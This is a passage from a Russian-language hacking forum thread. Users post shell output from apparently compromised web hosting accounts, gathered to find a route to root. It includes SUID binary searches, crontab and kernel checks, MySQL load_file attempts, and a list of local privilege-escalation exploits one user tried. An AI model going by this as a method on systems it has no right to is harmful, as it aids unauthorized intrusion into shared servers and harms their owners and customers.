    drwxr-xr-x  4 root root 12288 2015-05-29 10:37:18.893494371 +0300 x86_64-linux-gnu
    drwxr-xr-x  2 root root  4096 2015-05-12 13:03:24.923433001 +0300 xtables
    :/var/www/user/data $ mount
    sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
    proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
    udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=746519,mode=755)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
    tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=598420k,mode=755)
    /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 on / type ext4 (rw,relatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota,grpquota)
    tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
    tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1301280k)
    /dev/vda1 on /boot type ext2 (rw,relatime,errors=continue)
    rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime)
    :/var/www/user/data $ df -h
    Filesystem                                              Size  Used Avail Use% Mounted on
    rootfs                                                   58G   26G   29G  48% /
    udev                                                     10M     0   10M   0% /dev
    tmpfs                                                   585M  232K  585M   1% /run
    /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470   58G   26G   29G  48% /
    tmpfs                                                   5.0M     0  5.0M   0% /run/lock
    tmpfs                                                   1.3G     0  1.3G   0% /run/shm
    /dev/vda1                                                89M   17M   67M  21% /boot
    :/var/www/user/data $ cat /etc/issue
    Debian GNU/Linux 7 \n \l
    :/var/www/user/data $ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user  command
    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    :/var/www/user/data $ ls -la /etc/cron.d
    total 20
    drwxr-xr-x  2 root root 4096 Jun 15 13:23 .
    drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
    -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
    -rw-r--r--  1 root root  254 Jun 13  2012 awstats
    -rw-r--r--  1 root root  510 Mar 25 10:47 php5
    :/var/www/user/data $ ls -la /etc/cron.hourly
    total 12
    drwxr-xr-x  2 root root 4096 May 12 13:03 .
    drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
    -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
    :/var/www/user/data $ la -la /etc/cron.monthly
    sh: 1: la: not found
    :/var/www/user/data $ la -la /etc/cron.weekly
    sh: 1: la: not found
    :/var/www/user/data $ cat /etc/cron.hourly/*
    cat: /etc/cron.hourly/*: No such file or directory
    :/var/www/user/data $ cat /etc/cron.monthly/*
    cat: /etc/cron.monthly/*: No such file or directory
    :/var/www/user/data $ cat /etc/cron.weekly/*
    #!/bin/sh
    #
    # man-db cron weekly
    
    set -e
    
    iosched_idle=
    # Don't try to change I/O priority in a vserver or OpenVZ.
    if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \
       ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then
        dpkg_version="$(dpkg-query -W -f '${Version}' dpkg 2>/dev/null)"
        if dpkg --compare-versions "$dpkg_version" ge 1.15.0; then
            iosched_idle='--iosched idle'
        fi
    fi
    
    if ! [ -d /var/cache/man ]; then
        # Recover from deletion, per FHS.
        mkdir -p /var/cache/man
        chown man:root /var/cache/man || true
        chmod 2755 /var/cache/man
    fi
    
    # regenerate man database
    if [ -x /usr/bin/mandb ]; then
        # --pidfile /dev/null so it always starts; mandb isn't really a daemon,
        # but we want to start it like one.
        start-stop-daemon --start --pidfile /dev/null \
                          --startas /usr/bin/mandb --oknodo --chuid man \
                          $iosched_idle \
                          -- --quiet
    fi
    
    exit 0
    #!/bin/sh
    
    RKHUNTER=/usr/bin/rkhunter
    
    test -x $RKHUNTER || exit 0
    
    # source our config
    . /etc/default/rkhunter
    
    case "$CRON_DB_UPDATE" in
            [YyTt]*)
    
                    if [ ! -x /usr/bin/wget ] && [ ! -x /usr/bin/curl ] && [ ! -x /usr/bin/links ] && \
                       [ ! -x /usr/bin/elinks ] && [ ! -x /usr/bin/lynx ]; then
                         echo "No tool with which to download rkhunter updates was found on your system. Please install wget, curl, (e)links or lynx"
                         exit 1
                    fi
    
                    OUTFILE=`mktemp` || exit 1
    
                    case "$DB_UPDATE_EMAIL" in
                        [YyTt]*)
                            (
                            echo "Subject: [rkhunter] $(hostname -f) - Weekly database update"
                            echo "To: $REPORT_EMAIL"
                            echo ""
                            $RKHUNTER --versioncheck --nocolors --appendlog
                            $RKHUNTER --update --nocolors --appendlog
                            ) | /usr/sbin/sendmail $REPORT_EMAIL
                        ;;
                        *)
                            $RKHUNTER --versioncheck --appendlog 1>/dev/null 2>$OUTFILE
                            $RKHUNTER --update --appendlog 1>/dev/null 2>>$OUTFILE
                        ;;
                    esac
    
                    if [ -s "$OUTFILE" ]; then
                        (
                        echo "Subject: [rkhunter] $(hostname -f) - Weekly rkhunter database update"
                        echo "To: $REPORT_EMAIL"
                        echo ""
                        cat $OUTFILE
                        ) | /usr/sbin/sendmail $REPORT_EMAIL
                    fi
                    rm -f $OUTFILE
            ;;
    
            *)
                    exit 0
            ;;
    esac
    :/var/www/user/data $ cat /proc/version
    Linux version 3.2.0-4-amd64 ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.68-1+deb7u1
    :/var/www/user/data $ cat /proc/sys/vm/mmap_min_addr
    65536
    :/var/www/user/data $ pwd
    /var/www/user/data
    :/var/www/user/data $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    :/var/www/user/data $ id
    uid=500(user) gid=500(user) groups=500(user),1000(mgrsecure)
    :/var/www/user/data $ 



    пробовал читать файлы из mysql но много не прочитал
    select load_file('');

    И из эксплоитов пробовал, (чекер показал)
    - Kernel ia32syscall Emulation Privilege Escalation Language=c
    - Sendpage Local Privilege Escalation Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit Language=c
    - open-time Capability file_ns_capable() Privilege Escalation Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability Language=c
     
    #596 Valer4ik, 14 Sep 2015
    Last edited by a moderator: 14 Sep 2015
  17. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
  18. Valer4ik

    Valer4ik New Member

    Joined:
    25 Jul 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  19. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Такие дела.пробывал связку. Но меня послало.

    Code:
    
    $ uname -a
    Linux fortuna.timeweb.ru 3.10.82-timeweb #1 SMP Fri Jul 3 10:11:34 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot
    total 153444
    drwxr-xr-x  3 root root     4096 Oct  8 06:28 .
    drwxr-xr-x 28 root root     4096 Jul 21 06:26 ..
    -rw-r--r--  1 root root  3210565 Aug 26  2014 System.map-3.10.53-timeweb
    -rw-r--r--  1 root root  3210844 Oct 16  2014 System.map-3.10.58-timeweb
    -rw-r--r--  1 root root  3213729 Mar  3  2015 System.map-3.10.70-timeweb
    -rw-r--r--  1 root root  3213988 Jul  3 10:49 System.map-3.10.82-timeweb
    -rw-r--r--  1 root root  3214012 Oct  7 13:05 System.map-3.10.90-timeweb
    -rw-r--r--  1 root root  2911687 May 20  2013 System.map-3.2.45-timeweb
    -rw-r--r--  1 root root   132942 Aug 26  2014 config-3.10.53-timeweb
    -rw-r--r--  1 root root   133622 Oct 16  2014 config-3.10.58-timeweb
    -rw-r--r--  1 root root   134094 Mar  3  2015 config-3.10.70-timeweb
    -rw-r--r--  1 root root   134094 Jul  3 10:00 config-3.10.82-timeweb
    -rw-r--r--  1 root root   134094 Oct  7 12:17 config-3.10.90-timeweb
    -rw-r--r--  1 root root   129458 May 20  2013 config-3.2.45-timeweb
    drwxr-xr-x  3 root root    12288 Oct  8 06:28 grub
    -rw-r--r--  1 root root 16856878 Sep 16  2014 initrd.img-3.10.53-timeweb
    -rw-r--r--  1 root root 17273047 Feb 18  2015 initrd.img-3.10.58-timeweb
    -rw-r--r--  1 root root 17273539 Mar 18  2015 initrd.img-3.10.70-timeweb
    -rw-r--r--  1 root root 17273177 Sep 29 06:25 initrd.img-3.10.82-timeweb
    -rw-r--r--  1 root root 17272293 Oct  8 06:28 initrd.img-3.10.90-timeweb
    -rw-r--r--  1 root root 15767803 Sep 18  2013 initrd.img-3.2.45-timeweb
    -rw-r--r--  1 root root   176764 Nov 27  2011 memtest86+.bin
    -rw-r--r--  1 root root   178944 Nov 27  2011 memtest86+_multiboot.bin
    -rw-r--r--  1 root root  5939488 Aug 26  2014 vmlinuz-3.10.53-timeweb
    -rw-r--r--  1 root root  5941120 Oct 16  2014 vmlinuz-3.10.58-timeweb
    -rw-r--r--  1 root root  5948224 Mar  3  2015 vmlinuz-3.10.70-timeweb
    -rw-r--r--  1 root root  5949952 Jul  3 10:49 vmlinuz-3.10.82-timeweb
    -rw-r--r--  1 root root  5951264 Oct  7 13:05 vmlinuz-3.10.90-timeweb
    -rw-r--r--  1 root root  5480816 May 20  2013 vmlinuz-3.2.45-timeweb
    $ lls -la --full-time /lib64
    
    $ lls -la --full-time /lib
    
    $ mount
    /dev/sda1 on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g)
    /dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.user,jqfmt=vfsv0,usrquota,discard,_netdev)
    //172.16.0.30/homes on /mnt/backup type cifs (rw,noexec,nosuid,nodev)
    $ df -h
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1        46G   24G   20G  55% /
    udev             32G   12K   32G   1% /dev
    none            4.0G  579M  3.5G  15% /tmp
    tmpfs           6.3G  336K  6.3G   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none             32G   24K   32G   1% /run/shm
    none            1.0G  7.7M 1017M   1% /var/spool/exim4
    /dev/drbd0      1.5T  1.3T  170G  88% /home
    $ cat /etc/issue
    Ubuntu 12.04.5 LTS \n \l
    
    $ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    $ ls -la cron.d
    total 36
    drwxr-xr-x   2 root root  4096 Jul 16  2014 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    -rw-r--r--   1 root root   589 Apr 11  2013 mdadm
    -rw-r--r--   1 root root   499 Aug  9  2013 php5
    -rw-r-----   1 root root   116 Jul 16  2014 puppet_agent_restart
    -rw-r--r--   1 root root   396 Dec 16  2011 sysstat
    $ ls -la cron.hourly
    total 20
    drwxr-xr-x   2 root root  4096 Aug 22  2013 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    $ ls -la cron.monthly
    total 28
    drwxr-xr-x   2 root root  4096 Aug 23  2013 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    -rwxr-xr-x   1 root root  1281 May  6  2011 acct
    -rwxr-xr-x   1 root root   534 Mar  8  2012 debsums
    $ ls -la cron.weekly
    total 32
    drwxr-xr-x   2 root root  4096 Oct 10  2014 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    -rwxr-xr-x   1 root root   730 Dec 31  2011 apt-xapian-index
    -rwxr-xr-x   1 root root   533 Mar  8  2012 debsums
    -rwxr-xr-x   1 root root   907 Dec 28  2012 man-db
    $ cat /proc/version
    Linux version 3.10.82-timeweb ([email protected]) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #1 SMP Fri Jul 3 10:11:34 MSK 2015
    $ cat /proc/sys/vm/mmap_min_addr
    65536
    $ pwd
    /etc
    $ ls -la /usr/bin/staprun
    
    $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-xr-x 1 root root 31304 Mar  2  2012 /bin/fusermount
    -rwsr-xr-x 1 root root 35712 Nov  8  2011 /bin/ping
    -rwsr-xr-x 1 root root 36832 Sep 13  2012 /bin/su
    -rwsr-xr-x 1 root root 40256 Nov  8  2011 /bin/ping6
    -rwsr-xr-x 1 root root 94792 Jun 18  2014 /bin/mount
    -rwsr-xr-x 1 root root 69096 Jun 18  2014 /bin/umount
    -rwsr-xr-x 1 root root 32232 May 17  2013 /sbin/mount.cifs
    -rwsr-xr-x 1 root root 62400 Jul 29  2011 /usr/bin/mtr
    -rwsr-xr-x 1 root root 37096 Sep 13  2012 /usr/bin/chsh
    -rwsr-xr-x 2 root root 71280 Mar 12  2015 /usr/bin/sudoedit
    -rwsr-xr-x 2 root root 71280 Mar 12  2015 /usr/bin/sudo
    -rwsr-xr-x 1 root root 42824 Sep 13  2012 /usr/bin/passwd
    -rwsr-xr-x 1 root root 41832 Sep 13  2012 /usr/bin/chfn
    -rwsr-sr-x 1 daemon daemon 47928 Oct 25  2011 /usr/bin/at
    -rwsr-xr-x 1 root root 35712 Nov  8  2009 /usr/bin/tcptraceroute.mt
    -rwsr-xr-x 1 root root 32352 Sep 13  2012 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 63848 Sep 13  2012 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 18912 Nov  8  2011 /usr/bin/traceroute6.iputils
    -rwsr-xr-- 1 root dip 321552 Apr 21 20:33 /usr/sbin/pppd
    -r-sr-x--- 1 root customers 940632 Dec 28  2012 /usr/sbin/exim4
    -rwsr-x--- 1 _lldpd adm 55640 Nov 27  2011 /usr/sbin/lldpctl
    -rwsr-sr-x 1 libuuid libuuid 18856 Jun 18  2014 /usr/sbin/uuidd
    -rwsr-xr-x 1 root root 10592 Mar 26  2015 /usr/lib/pt_chown
    -rwsr-xr-- 1 root messagebus 292944 Nov 25  2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 10408 Dec 13  2011 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 240984 Aug 18 05:13 /usr/lib/openssh/ssh-keysign
    $
     
  20. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    Спасибо!
    Все равно ошибка та же...